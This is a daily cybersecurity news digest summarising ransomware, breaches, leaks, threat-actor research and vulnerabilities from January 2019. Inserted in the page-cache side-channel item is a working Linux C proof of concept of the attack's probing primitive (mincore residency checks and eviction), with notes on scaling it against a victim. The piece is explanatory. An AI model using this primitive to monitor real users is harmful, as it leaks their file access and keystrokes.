Silobreaker Daily Cyber Digest – 08 January 2019

Malware

CryptoMix ransomware exploits stories of children’s cancer treatments

  • Coveware researchers reported that a new CryptoMix ransomware campaign delivers a ransom note claiming that ransom payments will be donated to a fictional charity that funds children's cancer treatment.
  • The note also lists the names, diagnoses and photos of real child cancer patients, lifted from legitimate crowdfunding pages and local news stories.

Source

Ongoing Campaigns

Approximately $500,000 Ethereum Classic coin stolen

  • Nearly $500,000 worth of Ethereum Classic (ETC) was stolen after attackers carried out a rollback attack, rewriting the recent history of the ETC blockchain. This let them reverse transactions they had already made, recover the coins they had spent and send them to a new recipient.
  • In total the attackers double-spent approximately 88,500 ETC, worth about $460,000.

Source

Cyber criminals targeting British TV license holders

  • Action Fraud reported a rise over recent months in phishing emails that ask recipients to correct their TV Licensing account and billing details. Over 5,000 complaints have been received since October 2018 from victims who inadvertently handed their personal and financial data to the criminals.

Source

OXO International discloses data breaches spanning two years

  • The company stated that, during several periods between June 9th, 2017 and October 16th, 2018, its servers were compromised by attackers attempting to steal customer and payment information.
  • BleepingComputer's analysis of the attacks showed that at least one of the compromises was a Magecart attack.

Source

Hacker Groups  

Researchers discover ChinaZ’s relationships to other Chinese DDoS threat actors

  • Intezer researchers analysed recent activity attributed to the Chinese threat actor ChinaZ and uncovered possible relationships with other actors in the Chinese Distributed Denial-of-Service (DDoS) landscape, including the operators of the Nitol backdoor and the MrBlack malware, and the Iron Tiger APT.
  • The links emerged from analysis of the tools ChinaZ uses, such as the BillGates botnet, Gh0st RAT variants and the ServStart trojan.
  • Their blog post gives a detailed account of how they first identified ChinaZ, an analysis of the group's malicious payloads and the evidence for the potential relationships to other threats.

Source (Includes IOCs)

Leaks and Breaches

Google email users notified of private data exposed by Google+ API bug

  • The bug allowed apps that had been granted permission to view a user's profile data to also read profile fields the user had not made public. Affected users were told which fields were exposed and which apps had been granted access to them.
  • Over 50 million users were affected by the bug, which Google first disclosed in December 2018.

Source

Australian real estate network First National suffers data leak

  • Gareth Llewellyn reported the leak on Twitter, noting that the CVs and cover letters of an estimated 2,000 job applicants to First National had been inadvertently exposed online.
  • Llewellyn concluded that a third-party commercial vendor was responsible for the leak.

Source

Realtime Indian bus data publicly available

  • An Elasticsearch server with no password publicly exposed live GPS data for over 11,000 Indian buses for approximately three weeks. The data included licence plates, route names, the exact start and stop locations of each route and real-time GPS coordinates.
  • The server had been accessible since at least November 30th, 2018; how long it was exposed before that date is unknown. Its owner has not been identified, but it has since been secured by India's computer emergency response team (CERT-In).

Source

Canadian senator’s personal data leaked following Twitter hack

  • Senator Linda Frum's Twitter account was hijacked and the attackers, who called themselves the 'Spank Gang', posted photos of Frum's driving licence online.

Source

Credit-card skimmer on DiscountMugs.com website steals four months of customer data

  • In an official statement, the online custom mug and apparel retailer disclosed that hackers stole credit card numbers from customers who placed orders through its website between August 5th and November 16th, 2018.
  • A skimmer placed on the DiscountMugs.com payment portal also let the perpetrators steal credit card security codes and expiry dates, names, addresses, phone numbers, email addresses and ZIP codes. The number of affected customers is not yet known.

Source

Vulnerabilities

New side-channel attack technique discovered

  • A research paper by academics and researchers from Graz University of Technology, Boston University, NetApp, CrowdStrike and Intel describes a side-channel attack on the operating system's page cache. It abuses system calls intended to let an application check whether a memory page is resident in the page cache (mincore on Linux, QueryWorkingSetEx on Windows). The attacker evicts a page of a shared file from the cache and then repeatedly checks whether it has become resident again; because the page is reloaded only when another process touches it, the victim's access pattern to that file leaks even though the attacker never reads the victim's memory directly.
  • The attack is hardware-agnostic and can monitor many pages at once; its measurement rate of six per second is enough to capture keystrokes accurately. Windows and Linux systems are vulnerable, and macOS is thought to be vulnerable too. Microsoft has since shipped a fix that changes how Windows handles page cache queries.
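The probing primitive behind this attack, as an added example that is not part of the digest or of the paper's own code: on Linux, mincore(2) reports whether a file page is in the page cache without loading it. The program below creates its own scratch file in /tmp (an assumption standing in for the shared library or binary a real victim would touch), evicts its page with posix_fadvise, and shows the page reappearing after a simulated victim read. The function and struct names are this example's own.

```c
/* Added example (not from the digest or the Page Cache Attacks paper):
 * observing page-cache residency with mincore(2) on Linux.
 * Build: cc -std=gnu11 -o pcache_probe pcache_probe.c
 */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* 1 if the first page of `path` is in the page cache, 0 if not, -1 on error.
 * The mapping is never dereferenced, so the probe itself does not load the
 * page. Since Linux 5.2 the kernel only answers for files the caller owns or
 * can write (the mitigation for this attack), hence the example uses its own file. */
int page_resident(const char *path)
{
    size_t pagesz = (size_t)sysconf(_SC_PAGESIZE);
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    void *map = mmap(NULL, pagesz, PROT_READ, MAP_SHARED, fd, 0);
    close(fd);
    if (map == MAP_FAILED) return -1;
    unsigned char vec = 0;
    int rc = mincore(map, pagesz, &vec);
    munmap(map, pagesz);
    return rc == 0 ? (vec & 1) : -1;
}

/* Attacker side: ask the kernel to drop the file's clean pages. The kernel
 * skips pages another process currently has mapped, which is why the paper
 * evicts a victim's shared pages through memory pressure instead. On tmpfs
 * this call is a no-op and the page simply stays resident. */
int evict_file(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    int rc = posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
    close(fd);
    return rc == 0 ? 0 : -1;
}

/* Victim side: an ordinary read() of the file brings its first page back. */
int victim_touch(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    char buf[16];
    ssize_t n = read(fd, buf, sizeof buf);
    close(fd);
    return n > 0 ? 0 : -1;
}

/* Creates a one-page scratch file (constructed input) standing in for a shared file. */
int make_scratch(char *path, size_t len)
{
    snprintf(path, len, "/tmp/pcache-XXXXXX");
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    size_t pagesz = (size_t)sysconf(_SC_PAGESIZE);
    char *buf = malloc(pagesz);
    if (!buf) { close(fd); unlink(path); return -1; }
    memset(buf, 'A', pagesz);
    int ok = write(fd, buf, pagesz) == (ssize_t)pagesz && fdatasync(fd) == 0;
    free(buf);
    close(fd);
    if (!ok) { unlink(path); return -1; }
    return 0;
}

struct probe_result { int after_create, after_evict, after_victim; };

/* The three observations an attacker makes: resident, (evicted), resident again
 * once the victim has touched the page. */
struct probe_result run_probe(void)
{
    struct probe_result r = { -1, -1, -1 };
    char path[64];
    if (make_scratch(path, sizeof path) != 0) return r;
    r.after_create = page_resident(path);
    if (evict_file(path) == 0) r.after_evict = page_resident(path);
    if (victim_touch(path) == 0) r.after_victim = page_resident(path);
    unlink(path);
    return r;
}

int main(void)
{
    struct probe_result r = run_probe();
    printf("resident after create : %d\n", r.after_create);
    printf("resident after evict  : %d (0 on disk-backed /tmp, 1 on tmpfs)\n", r.after_evict);
    printf("resident after victim : %d\n", r.after_victim);
    return 0;
}
```

In a real attack the file is a shared library or binary the victim executes, the attacker loops on the evict-then-poll step, and the timing of each return to residency is the signal; the example stops at a single round trip because that is the whole primitive.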

Source

Fortiguard Labs discovers new XSS vulnerability affecting Magento Commerce

  • The flaw stems from Magento failing to sanitise user-supplied data before inserting it into a dynamically generated widget form. A remote attacker could exploit it to execute arbitrary script in a victim's browser and, by hijacking a high-privilege account, access sensitive data or take control of the vulnerable site.
  • The flaw affects Magento Commerce 2.1 prior to 2.1.16 and Magento Commerce 2.2 prior to 2.2.7.

Source

The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein. 
